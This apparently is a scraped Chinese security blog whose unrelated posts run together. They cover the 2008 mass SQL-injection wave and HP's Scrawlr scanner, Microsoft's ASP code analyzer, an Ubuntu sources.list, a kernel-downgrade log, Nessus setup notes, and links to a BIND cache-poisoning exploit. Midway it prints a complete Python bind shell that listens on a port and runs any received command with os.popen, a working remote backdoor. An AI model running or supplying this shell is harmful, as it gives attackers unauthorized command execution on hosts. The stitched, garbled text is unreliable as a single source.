PERL CGI SHELL

http://www.i170.com/Attach/70C0D4DC-1007-4270-92C9-C47F35D705D5

The HP Security Laboratory

Finding SQL Injection with Scrawlr

You have likely been tracking the mass SQL Injections that are currently sweeping through the net. Just last night I was shopping on www.ihomeaudio.com when I noticed they had been injected (they have since fixed their site). HP started to observe these attacks in January. They spread to over 500,000 sites by April before calming down and then picking up again in May. Most of the sites hit were initally Microsoft IIS ASP applications, causing many security companies to mistake this for some sort of new vulnerability in IIS and leading Microsoft to research the possibility, but alas, it's just our old friend, SQL Injection. Indeed we now see this attack hitting ASP and PHP sites and thanks to Google, it's easy to see just which sites out there have been hit.

While we were closely following the situation, the nice folks at Microsoft contacted us to see if we could work together to help people identify and cope with this issue. Together we quickly developed an action plan. The Microsoft Security Response Center (MSRC) was in a tough spot, hundreds of thousands of ASP sites were getting hacked, yet the vulnerability wasn't something Microsoft could release a patch for. SQL Injection is an issue that occurs because of poorly written web code interfacing with the web sites backend database and the solution was much more complicated than a simple patch. Developers were going to have to learn about security and were going to have to patch their code if they were going to solve this. Microsoft's Security Vulnerability Research & Defense has a blog about this problem as well where they share Microsoft's recomendations for this problem.

Now if you are no stranger to web security, you might be saying "well duh" right about now. Unfortunately to at least 500,000 sites on the Internet this concept is still pretty new and if you are one of the folks who are just now learning what SQL Injection is, I highly recomend you read HP's Web Security Research Group white papers on verbose and blind SQL injection located in our HP application security resource library.

Introducing HP Scrawlr 

When Microsoft contacted us, they asked us to equip their customers with the tools necessary to quickly find SQL Injection vulnerabilities in their sites. HP's application security software, DevInspect, QAInspect and WebInspect all find SQL Injection and countless other security vulnerabilities. DevInspect can even inspect your source code for SQL Injection as well and guide developers through the process of fixing their code. But what if you need to just quickly look for SQL Injection before you decide how you are going handle the issue? We needed something quick, highly accurate and easy to download and install.

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!

Technical details for Scrawlr

• Identify Verbose SQL Injection vulnerabilities in URL parameters
• Can be configured to use a Proxy to access the web site
• Will identify the type of SQL server in use
• Will extract table names (verbose only) to guarantee no false positives

Scrawlr does have some limitations versus our professional solutions and our fully functional SQL Injector tool

• Will only crawls up to 1500 pages
• Does not support sites requiring authentication
• Does not perform Blind SQL injection
• Cannot retrieve database contents
• Does not support JavaScript or flash parsing
• Will not test forms for SQL Injection (POST Parameters)

Download Scrawlr

You can download Scrawlr by visiting the following link: https://download.spidynamics.com/products/scrawlr/

Scrawlr is offered as-is and is not a supported product. Assistance may be available from other Scrawlr users in our online Scrawlr forum located at http://www.communities.hp.com/securitysoftware/forums/198.aspx

You can learn more about the HP Web Application Security Group and the HP Application Security Center by visiting our Security Community site at www.communities.hp.com/securitysoftware/ or by visiting our product information page at www.hp.com/go/securitysoftware/

Microsoft Source Code Analyzer for SQL Injection 工具现已发布，可用于查找 ASP 代码中的 SQL 注入漏洞

本页

简介

更多信息

先决条件

ASP 代码中的 SQL 注入问题

用法

语法

说明

参数列表

示例

检查输出结果

局限性

参考

MSSCASI_ASP /input="c:\source\logon.asp"



MSSCASI_ASP /GlobalAsaPath="C:\source" /input="c:\source\webitems\display.asp"



MSSCASI_ASP /GlobalAsaPath="C:\source" /input="c:\source\webitems\display.asp" /IncludePaths="C:\virtualdirectory1;C:\virtualdirectory2"



MSSCASI_ASP /input="c:\source\webitems\display.asp" /suppress="80406;80407"

回到顶端

By Robert Westervelt, News Editor
24 Jun 2008 | SearchSecurity.com

Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.

The software giant recommended customers use the tools in a security advisory Tuesday. It warned customers that it was tracking a rising number of attacks on websites that use Microsoft ASP and ASP.NET technologies. The problem lies with tiny software coding flaws that are difficult to detect.

"These SQL injection attacks do not exploit a specific software vulnerability, but instead, target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database," said Bill Sisk, Microsoft's security response communications (MSRC) manager.

Researchers had been tracking the mass SQL injection on thousands of websites over the last several months. The attacks are automated, using a number of hacker toolkits that can be purchased on the black market. Ultimately, the attack triggers an error on the server hosting the Web application, allowing the attacker to insert his own code and gain access to the system. Its unclear how many sites have been compromised.

In its advisory to customers, Microsoft identified Scrawlr, a vulnerability scanner co-developed by Hewlett Packard and researchers at the MSRC, which identifies whether a website is susceptible to SQL injection. In a blog entry, HP's Erik Peterson, senior director of products for the application security center, said the tool is not as robust as the vendor's fully supported products, but it is a free and fast way to analyze a website for potential problems. The tool can't identify the line of code responsible and will only crawl up to 1,500 pages. It doesn't support sites requiring authentication and won't test forms for SQL injection, among other limitations, he said.

UrlScan version 3.0 Beta is a tool developed by Microsoft that blocks HTTP requests. Microsoft said the tool will stop harmful requests from reaching the Web application on the server. The tool is designed to read the configuration from the urlscan.ini file. Multiple instances of the tool can be installed to serve as URL filters. It can be tweaked by an administrator to restrict the types of requests processed by the Internet Information Services (ISS).

Microsoft Source Code Analyzer for SQL Injection is also available to detect ASP code susceptible to SQL injection attacks. It generates a report that displays the coding issue. Microsoft admits that the tool also has some limitations -- it only addresses ASP code written in VBScript, and its use could result in some parsing errors.

Putting the tools in the hands of Web developers and IT administrators could help accelerate security awareness in the same way poor product quality did in the mid-90s, said Amrit Williams, a former Gartner analyst, now chief technology officer at BigFix. Williams cautioned that the tools are not a substitute for more advanced technologies or experienced and thorough human analysis.

"Unfortunately it always takes a significant incident to drive folks towards doing the right thing," Williams said in an email exchange. "This is especially true of security as part of the software development life cycle and even more so for Web development, which tends to be rapid, ad-hoc and less structured than traditional software development."

最近做的一个傻瓜实验，做实验的原因还是因为和客户探讨的问题，现在的客户越来越强了，都开始觉得跟不上他们的步伐了，再不努力很快我们就都要失业了：P

文档和素材放在这里。

#deb cdrom:[Ubuntu 8.04 _Hardy Heron_ - Release i386 (20080423)]/ hardy main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.

deb http://cn.archive.ubuntu.com/ubuntu/ hardy main restricted
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy main restricted

## Major bug fix updates produced after the final release of the
## distribution.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates main restricted
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates main restricted

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## universe WILL NOT receive any review or updates from the Ubuntu security
## team.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy universe
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy universe
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates universe
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates universe

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy multiverse
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy multiverse
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates multiverse
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates multiverse

## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
# deb http://cn.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse
# deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse

## Uncomment the following two lines to add software from Canonical's
## 'partner' repository. This software is not part of Ubuntu, but is
## offered by Canonical and the respective vendors as a service to Ubuntu
## users.
# deb http://archive.canonical.com/ubuntu hardy partner
# deb-src http://archive.canonical.com/ubuntu hardy partner

# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security main restricted
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security main restricted
# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security universe
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security universe
# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security multiverse
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security multiverse

deb http://ubuntu.cn99.com/ubuntu/ gutsy main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-security main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-updates main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-proposed main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-backports main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-security main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-updates main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-proposed main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-backports main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu-cn/ gutsy main restricted universe multiverse

deb http://www.debian-multimedia.org etch main
deb http://www.debian-multimedia.org testing main

最近因为一些关系，需要对LINUX的内核进行更换操作，记下了操作过程，希望各位拍砖：

原系统：Fedora Core 9
Linux localhost.localdomain 2.6.25-14.fc9.i686 #1 SMP Thu May 1 06:28:41 EDT 2008 i686 i686 i386 GNU/Linux
需要降级为：
linux-2.6.24.6
具体操作：
[root@localhost ~]# cd /usr/local/sbin
[root@localhost sbin]# wget http://www.de.kernel.org/pub/linux/kernel/v2.6/linux-2.6.24.6.tar.gz
[root@localhost sbin]# tar -zxvf linux-2.6.24.6.tar.gz
[root@localhost sbin]# mv linux-2.6.24.6 linux
[root@localhost sbin]# ln -s /usr/local/sbin/linux /usr/src/linux
[root@localhost sbin]# cd /usr/src/linux
[root@localhost linux]# make mrproper                <--删除以前的.o文件，第一次运行其实这步可以省略
[root@localhost linux]# make menuconfig
[root@localhost linux]# make dep                     <--建立依赖关系，第一次运行其实这步可以省略
*** Warning: make dep is unnecessary now.
[root@localhost linux]# make clean                   <--删除没用的文件
[root@localhost linux]# make bzImage                 <--编译内核
[root@localhost linux]# make modules                 <--编译模块
[root@localhost linux]# make modules_install         <--安装模块
[root@localhost linux]# make install                 <--这步是建立initrd（加载LKM用的程序）
[root@localhost linux]# new-kernel-pkg --install --mkinitrd --depmod 2.6.24.6  <--写入grub.conf
[root@localhost linux]# shutdown -r now
重启后的升级结果是：
Linux localhost.localdomain 2.6.24.6 #1 SMP Tue Aug 26 23:15:14 CST 2008 i686 i686 i386 GNU/Linux

谢谢同事小钟的指导，在这里。

搜索引擎检测脚本:

谢谢Jetty的提醒，还修复了一些bug，在这里：

www.i170.com/Attach/89547786-C0CE-4AFC-99BF-71F6093574EB 

#!/usr/bin/python
#code by demonalex@163.com
import socket;
import os;

address=raw_input("Server Address:");
print "Repeat: Server Address:",address,"!";
port=raw_input("Port:");
print "Repeat: Port:",port,"!";

HOST=address;
PORT=int(port);

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,6);
s.bind((HOST,PORT));
s.listen(1);
conn, addr = s.accept();
#print "Connect by ",addr,"!";
while(1):
    conn.send("(");
    conn.send(os.getcwd());
    conn.send(")command:");
    data=conn.recv(1024);
    if not data: break;
    #print data,":",len(data);
    if (data[0:3]=='cd '):
        curr_dir=data[3:].strip();
        os.chdir(curr_dir);
        continue;
    if ((data[1]==':')and(len(data)==3)):
        curr_dir=data.strip();
        os.chdir(curr_dir);
        continue;
    if (data=="exit\n"):
        conn.send("bye!\n");
        break;
    result=os.popen(data).read();
    conn.send(result);
conn.close;
s.close;

Ubuntu下安装nessus
writer: demonalex[at]dark2s[dot]org


｛运行环境｝
操作系统： Ubuntu 8.04桌面版（2.6.24-16-generic #1 SMP）
nessus： version 2.2.9

｛安装过程｝
root@demonalex-laptop:~# apt-get update
root@demonalex-laptop:~# apt-get -y install nessus nessusd nessus-plugins

｛配置过程｝
安装完成后通过nessus-adduser添加用户：
root@demonalex-laptop:~# nessus-adduser
Using /var/tmp as a temporary file holder

Add a new nessusd user
----------------------


Login : admin                              <--输入新建用户名
Authentication (pass/cert) [pass] :        <--直接回车（通过密码认证）
Login password :                           <--输入密码
Login password (again) :                   <--再次输入密码

User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that admin has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser(8) man page for the rules syntax

Enter the rules for this user, and hit ctrl-D once you are done :
(the user can have an empty rules set)           <--按Ctrl+D继续


Login             : admin
Password          : ***********
DN                :
Rules             :


Is that ok ? (y/n) [y]                           <--直接回车（确认添加操作）
user added.
root@demonalex-laptop:/usr/bin# nessus-fetch --register 你的序列号

｛升级}
root@demonalex-laptop:~# nessus-update-plugins

{运行｝
首先运行服务端：
root@demonalex-laptop:~# nessusd -D
然后进入桌面，选择运行Panel上的“Application->Internet->Nessus”，在弹出的nessus GUI客户端
的“Nessusd Host”分页中输入帐号与密码，然后按“Log in”按钮，待登录成功后将自动跳到“Plugins”
分页，选择要扫描的插件，然后手工进入“Target”分页，输入扫描目标IP地址，最后“Start the scan”
按钮，待扫描完成后就可以看到报告窗口了。

运行结果：

另外，会在同一目录下生成uselog.txt的日志文件．继承原来的get系列程序，但这次是＂开源＂，哈哈：Ｄ，因为还是很烂的缘故，希望各位大侠帮忙改改：Ｐ，代码与测试素材的下载地址在这里：www.i170.com/Attach/39450C6D-8D05-4493-91B0-E2FC48458768

，不想下载的话可以直接看下面的代码：

#BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

#http://www.milw0rm.com/exploits/6123

http://security.ctocio.com.cn/securitycomment/122/8210122.shtml

wiki.ubuntu.org.cn/Apt-get%E4%BD%BF%E7%94%A8%E6...

forum.ubuntu.com.cn/viewtopic.php?t=65707&highl...

http://www.venustech.com.cn/Case/183/121.Html